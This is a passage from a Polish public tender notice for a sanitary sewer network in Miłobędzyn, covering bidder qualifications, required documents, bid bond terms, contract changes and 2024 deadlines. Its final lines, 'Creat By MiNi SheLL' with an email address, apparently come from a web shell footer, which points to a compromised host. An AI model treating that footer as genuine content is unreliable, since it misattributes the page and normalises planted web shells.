wykonania zamówienia.<br/> Wykonawca spełni warunek jeżeli wykaże, że dysponuje lub będzie dysponować <br/> następującymi osobami:<br/> - co najmniej jedną osobą posiadającą uprawnienia budowlane do kierowania robotami <br/> budowlanymi w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/> gazowych, wodociągowych i kanalizacyjnych, takimi jak: sieci i instalacje cieplne, <br/> wentylacyjne, gazowe, wodociągowe i kanalizacyjne bez ograniczeń;<br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, <br/> w oparciu o informacje zawarte w:<br/> - formularzu ofertowym według załącznika nr 1 do SWZ;<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu według załącznika nr 2 do SWZ;<br/> - oświadczeniu Podmiotu udostępniającego zasoby o spełnianiu warunków udziału <br/> w postępowaniu według załącznika nr 2a do SWZ;<br/> - zobowiązaniu innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów <br/> na okres korzystania z nich przy wykonywaniu zamówienia według załącznika nr 5 do SWZ;<br/> - wykazie osób skierowanych przez wykonawcę do realizacji zamówienia według załącznika<br/> nr 8 do SWZ; <br/> - dokumencie potwierdzającym posiadanie uprawnień budowlanych do kierowania robotami <br/> budowlanymi w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/> wodociągowych i kanalizacyjnych, takimi jak: sieci, instalacje cieplne, wentylacyjne, gazowe, <br/> wodociągowe i kanalizacyjne – bez ograniczeń oraz aktualne zaświadczenie o członkostwie <br/> we właściwej izbie samorządu zawodowego;<br/> 2) W zakresie doświadczenia zawodowego niezbędnego do wykonania zamówienia. <br/> Warunek w rozumieniu Zamawiającego spełni Wykonawca, który wykaże: co najmniej 1 roboty <br/> budowlanej polegającej na budowie lub przebudowie lub rozbudowie lub modernizacji <br/> kanalizacji sanitarnej o wartości łącznej brutto minimum 200.000,00 zł wykonanej <br/> nie wcześniej niż w okresie ostatnich 5 (pięciu) lat przed upływem terminu składania ofert,<br/> a jeżeli okres prowadzenia działalności jest krótszy – w tym okresie. <br/> Ocena spełniania warunku udziału w postępowaniu zostanie dokonana przez Zamawiającego, <br/> w oparciu o informacje zawarte w:<br/> - formularzu ofertowym według załącznika nr 1 do SWZ;<br/> - oświadczeniu o spełnianiu warunków udziału w postępowaniu według załącznika<br/> nr 2 do SWZ;<br/> - oświadczeniu Podmiotu udostępniającego zasoby o spełnianiu warunków udziału <br/> w postępowaniu według załącznika nr 2a do SWZ;<br/> - zobowiązaniu innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych zasobów <br/> na okres korzystania z nich przy wykonywaniu zamówienia według załącznika nr 5 do SWZ;<br/> - wykazie wykonanych robót budowlanych według załącznika nr 7 do SWZ; <br/> - w dowodach określających, czy roboty te zostały wykonane w sposób należyty oraz <br/> wykazujących, czy zostały wykonane zgodnie z zasadami sztuki budowlanej i prawidłowo <br/> ukończone. Dowodami, o których mowa, są referencje bądź inne dokumenty wystawione przez <br/> podmiot, na rzecz którego roboty budowlane były wykonane, a jeżeli z uzasadnionej przyczyny <br/> o obiektywnym charakterze Wykonawca nie jest w stanie uzyskać tych dokumentów – inne <br/> dokumenty.<br/>Uwaga: <br/>- Zamawiający może na każdym etapie postępowania uznać, że Wykonawca nie posiada <br/> wymaganych zdolności, jeżeli posiadanie przez wykonawcę sprzecznych interesów, <br/> w szczególności zaangażowanych zasobów technicznych lub zawodowych wykonawcy w inne <br/> przedsięwzięcia gospodarcze wykonawcy może mieć negatywny wpływ na realizację <br/> zamówienia.<br/>- Zamawiający oceni spełnienie warunków udziału w postępowaniu metodą spełnia lub nie spełnia<br/> na podstawie wymaganych dokumentów i oświadczeń dołączonych do oferty. <br/>- Z treści załączonych dokumentów musi wynikać jednoznacznie, iż warunki Wykonawca spełnia. <br/> Wykonawca musi wykazać spełnianie każdego z warunków. <h3 class="mb-0">5.5.) Zamawiający wymaga złożenia oświadczenia, o którym mowa w art.125 ust. 1 ustawy: <span class="normal">Tak</span></h3> <h3 class="mb-0"> 5.6.) Wykaz podmiotowych środków dowodowych na potwierdzenie niepodlegania wykluczeniu: <span class="normal">1. Oświadczenie Wykonawcy o niepodleganiu wykluczeniu z postępowania (załącznik nr 3 do SWZ); <br/>2. Oświadczenie Podmiotu udostępniającego zasoby o niepodleganiu wykluczeniu <br/> z postępowania (załącznik nr 3a do SWZ);<br/>3. Oświadczenie wykonawcy, o braku przynależności <br/> do tej samej grupy kapitałowej, z innym wykonawcą, który złożył <br/> odrębną ofertę, ofertę częściową lub wniosek o dopuszczenie do udziału w postępowaniu, albo <br/> oświadczenia o przynależności do tej samej grupy kapitałowej wraz z dokumentami lub <br/> informacjami potwierdzającymi przygotowanie oferty, oferty częściowej lub wniosku <br/> o dopuszczenie do udziału w postępowaniu niezależnie od innego wykonawcy należącego do tej <br/> samej grupy kapitałowej – (załącznik nr 6 do SWZ);<br/>4. Odpis lub informację z KRS lub z CEiDG , <br/> sporządzonych nie wcześniej niż 3 miesiące przed jej założeniem, jeżeli odrębne przepisy <br/> wymagają wpisu do rejestru lub ewidencji;<br/>5. Zaświadczenie właściwego naczelnika urzędu skarbowego potwierdzające, że wykonawca nie <br/> zalega z opłaceniem podatków i opłat, wystawionego <br/> nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku zalegania z opłaceniem <br/> podatków lub opłat wraz z zaświadczeniem zamawiający żąda złożenia dokumentów <br/> potwierdzających, że odpowiednio przed upływem terminu składania ofert wykonawca dokonał <br/> płatności należnych podatków lub opłat wraz z odsetkami lub grzywnami lub zawarł wiążące <br/> porozumienie w sprawie spłat tych należności;<br/>6. Zaświadczenie albo inny dokument właściwej terenowej jednostki organizacyjnej Zakładu <br/> Ubezpieczeń Społecznych lub właściwego oddziału regionalnego lub właściwej placówki <br/> terenowej kasy Rolniczego ubezpieczenia Społecznego potwierdzające, że wykonawca nie <br/> zalega z opłacaniem składek na ubezpieczenia społeczne i zdrowotne wystawione nie wcześniej niż 3 miesiące przed jego złożeniem, a w przypadku <br/> zalegania z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne wraz <br/> z zaświadczeniem albo innym dokumentem zamawiający żąda aby przed upływem terminu <br/> składania ofert wykonawca dokonał płatności należnych składek na ubezpieczenia społeczne lub <br/> zdrowotne wraz z odsetkami lub grzywnami lub zawarł wiążące porozumienie w sprawie spłat <br/> tych należności;<br/>7. Oświadczenie wykonawcy o aktualności informacji zawartych w oświadczeniu, o którym <br/> mowa w art. 125 ust. 1 ustawy Pzp, w zakresie podstaw wykluczenia z postępowania <br/> wskazanych przez zamawiającego, <br/> (załącznik nr 10 do SWZ).<br/>8. Jeżeli Wykonawca ma siedzibę lub miejsce zamieszkania poza terytorium Rzeczypospolitej Polskiej, zamiast:<br/>8.1. dokumentu, o którym mowa jest mowa w pkt 4 składa dokument lub<br/>dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że nie otwarto jego likwidacji ani nie ogłoszono upadłości.<br/>8.2. zaświadczenia albo innego dokumentu potwierdzającego, że wykonawca nie zalega z opłacaniem składek na ubezpieczenia społeczne lub zdrowotne, składa dokument lub dokumenty wystawione w kraju, w którym wykonawca ma siedzibę lub miejsce zamieszkania, potwierdzające odpowiednio, że: nie naruszył obowiązków dotyczących płatności podatków, opłat lub składek na ubezpieczenie społeczne lub zdrowotne.<br/>Dokumenty te powinny być wystawione nie wcześniej niż 3 miesiące przed jego złożeniem.<br/>9. Jeżeli w kraju, w którym Wykonawca ma siedzibę lub miejsce zamieszkania, nie wydaje się w/w dokumentów, zastępuje się je w całości lub części dokumentem zawierającym odpowiednio oświadczenie Wykonawcy, ze wskazaniem osoby albo osób uprawnionych do jego reprezentacji, złożone przed notariuszem lub przed organem sądowym, administracyjnym albo organem samorządu zawodowego lub gospodarczego właściwym ze względu na siedzibę lub miejsce zamieszkania Wykonawcy.</span> </h3> <h3 class="mb-0"> 5.7.) Wykaz podmiotowych środków dowodowych na potwierdzenie spełniania warunków udziału w postępowaniu: <span class="normal">1. Oświadczenie Wykonawcy o spełnianiu warunków udziału w postępowaniu <br/> – składane na podstawie art. 125 ust. 1 ustawy PZP (załącznik nr 2 do SWZ);<br/>2. Oświadczenie Podmiotu udostępniającego zasoby dotyczące spełniania warunków <br/> udziału w postępowaniu ( załącznik nr 2a do SWZ).<br/>3. Zobowiązanie innego podmiotu do oddania do dyspozycji Wykonawcy niezbędnych <br/> zasobów na okres korzystania z nich przy wykonywaniu zamówienia ( załącznik nr 5 do SWZ);<br/>4. Wykaz robót budowlanych obejmujący wykonanie co najmniej 1 roboty budowlanej polegającej <br/> na budowie lub przebudowie lub rozbudowie lub modernizacji kanalizacji sanitarnej o wartości <br/> łącznej brutto minimum 200.000,00 zł wykonanych nie wcześniej niż w okresie ostatnich 5 (pięciu) <br/> lat przed upływem terminu składania ofert, a jeżeli okres prowadzenia działalności jest krótszy <br/> – w tym okresie – (załącznik nr 7 do SWZ). Wskazany wyżej wykaz robót Wykonawcy <br/> stanowi jedynie minimalne wymagania dla spełnienia warunku udziału w postępowaniu.<br/>5. Wykaz osób skierowanych przez wykonawcę do realizacji zamówienia publicznego, wskazujący <br/> w szczególności co najmniej jedną osobę posiadającą uprawnienia budowlane do kierowania <br/> robotami w specjalności sieci, instalacji i urządzeń cieplnych, wentylacyjnych, gazowych, <br/> wodociągowych i kanalizacyjnych, takimi jak: sieci i instalacje cieplne, wentylacyjne, gazowe, <br/> wodociągowe i kanalizacyjne bez ograniczeń. Do wykazu należy dołączyć dokumenty <br/> potwierdzające posiadanie uprawnień budowlanych w zakresie kierowania robotami <br/> budowlanymi w specjalności instalacyjnej sieci, instalacji i urządzeń cieplnych, wentylacyjnych, <br/> gazowych, wodociągowych i kanalizacyjnych, takimi jak: sieci i instalacje cieplne, wentylacyjne, <br/> gazowe, wodociągowe i kanalizacyjne bez ograniczeń oraz aktualne zaświadczenie <br/> o członkostwie we właściwych izbach samorządu zawodowego (załącznik nr 8 do SWZ). Wskazany wyżej wykaz <br/> personelu Wykonawcy stanowi jedynie minimalne wymagania dla spełnienia warunku udziału <br/> w postępowaniu.</span> </h3> <h3 class="mb-0">5.11.) Wykaz innych wymaganych oświadczeń lub dokumentów: </h3> 1. Dowód potwierdzający wniesienie wadium.<br/>2. Pełnomocnictwo<br/> - w przypadku złożenia oferty wspólnej pełnomocnictwo udzielone liderowi;<br/> - gdy umocowanie osoby składającej ofertę nie wynika z dokumentów rejestrowych (KRS, <br/> CEiDG lub innego właściwego rejestru), wykonawca który składa ofertę za pośrednictwem <br/> pełnomocnika, powinien dołączyć do oferty dokument pełnomocnictwa obejmujący swym <br/> zakresem umocowanie do złożenia oferty lub do złożenia oferty i podpisania umowy; <br/> - upoważnienie (pełnomocnictwo) musi w swej treści jednoznacznie wskazywać <br/> uprawnienia do podpisania oferty lub do podpisania oferty i umowy. <h2 class="bg-light p-3 mt-4">SEKCJA VI - WARUNKI ZAMÓWIENIA</h2> <h3 class="mb-0">6.1.) Zamawiający wymaga albo dopuszcza oferty wariantowe: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.3.) Zamawiający przewiduje aukcję elektroniczną: <span class="normal">Nie</span></h3> <h3 class="mb-0">6.4.) Zamawiający wymaga wadium: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.4.1) Informacje dotyczące wadium: </h3> 1. Oferta winna być zabezpieczona wadium w wysokości 3.000,00 zł <br/> (słownie: trzy tysiące złotych)<br/><br/>2. Wadium wnosi się przed upływem terminu składania ofert, w szczególności wadium w formie <br/> pieniężnej winno wpłynąć na konto Zamawiającego przed upływem terminu składania ofert. <br/><br/>3. Wadium musi obejmować okres związania ofertą tj. do dnia 03.01.2025 roku <br/> licząc od dnia upływu terminu składania ofert. <br/><br/>4. Wykonawca może wnieść wadium w: <br/>a) pieniądzu, <br/>b) gwarancjach bankowych, <br/>c) gwarancjach ubezpieczeniowych, <br/>d) poręczeniach udzielanych przez podmioty, o których mowa w art. 6b ust. 5 pkt 2 ustawy <br/> z dnia 9 listopada 2000 r. o utworzeniu Polskiej Agencji Rozwoju Przedsiębiorczości<br/> (j.t.: Dz. U. z 2024 r. poz. 419).<br/><br/>5. W przypadku wnoszenia wadium w pieniądzu Wykonawca jest zobowiązany wpłacić <br/> wadium przelewem na rachunek Zamawiającego: PKO Bank Polski S.A.<br/> Nr konta bankowego: 17 1020 3541 0000 5402 0393 2738, z dopiskiem na przelewie: <br/> „Wadium na zabezpieczenie oferty Wykonawcy………………………………………<br/> dotyczącej zamówienia p.n.: „Budowa sieci kanalizacji sanitarnej <br/> odprowadzającej oczyszczone ścieki z oczyszczalni ścieków <br/> w m. Miłobędzyn”.<br/><br/>6. Za skuteczne wniesienie wadium w pieniądzu Zamawiający uważa wadium, które w wyznaczonym <br/> terminie składania ofert znajduje się na wskazanym rachunku bankowym Zamawiającego. <br/><br/>7. Zamawiający wymaga załączenia do oferty dokumentu potwierdzającego wniesienie wadium <br/> w pieniądzu na rachunek bankowy Zamawiającego. <br/><br/>8. Wadium wniesione w pieniądzu Zamawiający przechowuje na rachunku bankowym. <br/><br/>9. W przypadku wadium wnoszonego w innej formie niż w pieniądzu, wykonawca składa oryginał <br/> dokumentu w postaci elektronicznej załączając go do oferty. Dokument ten powinien być podpisany <br/> kwalifikowanym podpisem elektronicznym przez jego wystawcę. Z treści dokumentu (gwarancji, <br/> poręczenia) winno wynikać bezwarunkowe, na każdym pisemne żądanie zgłoszone przez <br/> Zamawiającego w terminie związania ofertą, zobowiązanie Gwaranta do wypłaty Zamawiającemu <br/> pełnej kwoty wadium. <h3 class="mb-0">6.5.) Zamawiający wymaga zabezpieczenia należytego wykonania umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">6.6.) Wymagania dotyczące składania oferty przez wykonawców wspólnie ubiegających się o udzielenie zamówienia: </h3> 1. Wykonawcy mogą wspólnie ubiegać się o udzielenie zamówienia. W takim przypadku Wykonawcy <br/> ustanawiają pełnomocnika do reprezentowania ich w postępowaniu albo do reprezentowania<br/> i zawarcia umowy w sprawie zamówienia publicznego. Pełnomocnictwo winno być załączone <br/> do oferty.<br/><br/>2. W przypadku Wykonawców wspólnie ubiegających się o udzielenie zamówienia, oświadczenia, <br/> o których mowa w Rozdziale XIV pkt. 1.1. i 1.2. SWZ, składa każdy z wykonawców. Oświadczenia <br/> te potwierdzają brak podstaw wykluczenia oraz oświadczenie o spełnianiu warunków udziału <br/> w zakresie, w jakim każdy z wykonawców wykazuje spełnianie warunków udziału w postępowaniu. <br/><br/>3. Wykonawcy wspólnie ubiegający się o udzielenie zamówienia dołączają do oferty oświadczenie, <br/> z którego wynika, które roboty budowlane wykonają poszczególni wykonawcy zgodnie <br/> z załącznikiem nr 4 do SWZ.<br/><br/>4. Oświadczenia i dokumenty potwierdzające brak podstaw do wykluczenia z postępowania <br/> składa każdy z Wykonawców wspólnie ubiegających się o zamówienie. <h3 class="mb-0">6.7.) Zamawiający przewiduje unieważnienie postępowania, jeśli środki publiczne, które zamierzał przeznaczyć na sfinansowanie całości lub części zamówienia nie zostały przyznane: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VII - PROJEKTOWANE POSTANOWIENIA UMOWY</h2> <h3 class="mb-0">7.1.) Zamawiający przewiduje udzielenia zaliczek: <span class="normal">Nie</span></h3> <h3 class="mb-0">7.3.) Zamawiający przewiduje zmiany umowy: <span class="normal">Tak</span></h3> <h3 class="mb-0">7.4.) Rodzaj i zakres zmian umowy oraz warunki ich wprowadzenia: </h3> 1. Zmiana umowy może nastąpić w przypadkach:<br/>1) określonych w art. 455 ustawy Prawo zamówień publicznych,<br/>2) przewidzianych w niniejszej umowie.<br/>2. W przypadku każdej zmiany, o której mowa powyżej, po stronie wnoszącego propozycję zmian <br/> leży uzasadnienie powstałej okoliczności, a wniosek o zmianę postanowień umowy musi być <br/> wyrażony na piśmie.<br/>3. Wszelkie zmiany, uzupełnienia treści niniejszej Umowy mogą być dokonane za zgodą obu stron <br/> w formie pisemnego aneksu pod rygorem nieważności. Każdy sporządzony aneks dla swej <br/> ważności wymaga podpisu obu Stron niniejszej Umowy.<br/>4. Strony przewidują zmiany umowy na podstawie art. 455 ustawy Prawo zamówień publicznych <br/> w zakresie:<br/>1) Zmniejszenia/zwiększenia zakresu rzeczowego,<br/>2) Zmniejszenia/zwiększenia wartości umowy.<br/>5. Zgodnie z art. 455 ustawy Pzp strony dopuszczają możliwość zmiany postanowień zawartej <br/> Umowy w zakresie:<br/>1) realizacji, przez dotychczasowego wykonawcę dodatkowych robót budowlanych, których nie <br/> uwzględniono w zamówieniu podstawowym, <br/>2) zmiany wysokości ceny, jeśli spowodowana jest okolicznościami, których zamawiający, działając <br/> z należytą starannością, nie mógł przewidzieć, o ile zmiana nie modyfikuje ogólnego charakteru <br/> umowy a wzrost ceny spowodowany każdą kolejną zmianą nie przekracza 50% wartości <br/> pierwotnej umowy.<br/>3) wynagrodzenia, jeśli łączna ich wartość jest niższa niż 15% wartości pierwotnej umowy, a zmiany <br/> te nie powodują zmiany ogólnego charakteru umowy.<br/>6. Strony dopuszczają możliwość zmiany postanowień zawartej Umowy w zakresie:<br/>1) zmiany terminu realizacji przedmiotu umowy z przyczyn niezależnych od Wykonawcy, <br/>2) zmiany sposobu wykonania Umowy w razie, gdy jest niezbędna ze względów technicznych, <br/> technologicznych lub organizacyjnych, o ile zmiana taka jest korzystna dla Zamawiającego lub <br/> konieczna w celu prawidłowego wykonania Umowy, a brak zmiany sposobu wykonania umowy <br/> skutkowałby niewykonaniem lub wadliwym wykonaniem przedmiotu umowy pod warunkiem, że <br/> Wykonawca zaoferuje rozwiązania techniczne, technologiczne lub organizacyjne o równoważnych <br/> lub lepszych parametrach; <br/>3) zmiany technologii wykonania, rezygnacji z wykonania części robót; <br/>4) gdy konieczność wprowadzenia zmian będzie następstwem zmian, wytycznych lub zaleceń <br/> instytucji, która przyznała środki na sfinansowanie zamówienia;<br/>5) zmiany terminów płatności wynikające z wszelkich zmian wprowadzonych do umowy;<br/>6) wynagrodzenia w przypadku ustawowej zmiany podatku VAT.<br/>7. Strony dopuszczają możliwość zmiany postanowień zawartej Umowy zmiany umowy w przypadku <br/> zmiany przepisów prawa obowiązujących na dzień zawarcia umowy w zakresie mającym wpływ na <br/> realizację umowy.<br/>8. Zmiana postanowień zawartej umowy, w zakresie terminu wykonania umowy, może nastąpić <br/> w sytuacji gdy fakt opóźnienia w realizacji przedmiotu umowy wynika z przyczyn obiektywnych <br/> niezależnych od Wykonawcy, o których Zamawiający powinien być na bieżąco informowany. <h3 class="mb-0">7.5.) Zamawiający uwzględnił aspekty społeczne, środowiskowe, innowacyjne lub etykiety związane z realizacją zamówienia: <span class="normal">Nie</span></h3> <h2 class="bg-light p-3 mt-4">SEKCJA VIII – PROCEDURA</h2> <h3 class="mb-0">8.1.) Termin składania ofert: <span class="normal">2024-12-05 10:00</span></h3> <h3 class="mb-0">8.2.) Miejsce składania ofert: <span class="normal">https://ezamowienia.gov.pl</span></h3> <h3 class="mb-0">8.3.) Termin otwarcia ofert: <span class="normal">2024-12-05 11:00</span></h3> <h3 class="mb-0">8.4.) Termin związania ofertą: <span class="normal"> 30 dni </span></h3>

Creat By MiNi SheLL
Email: jattceo@gmail.com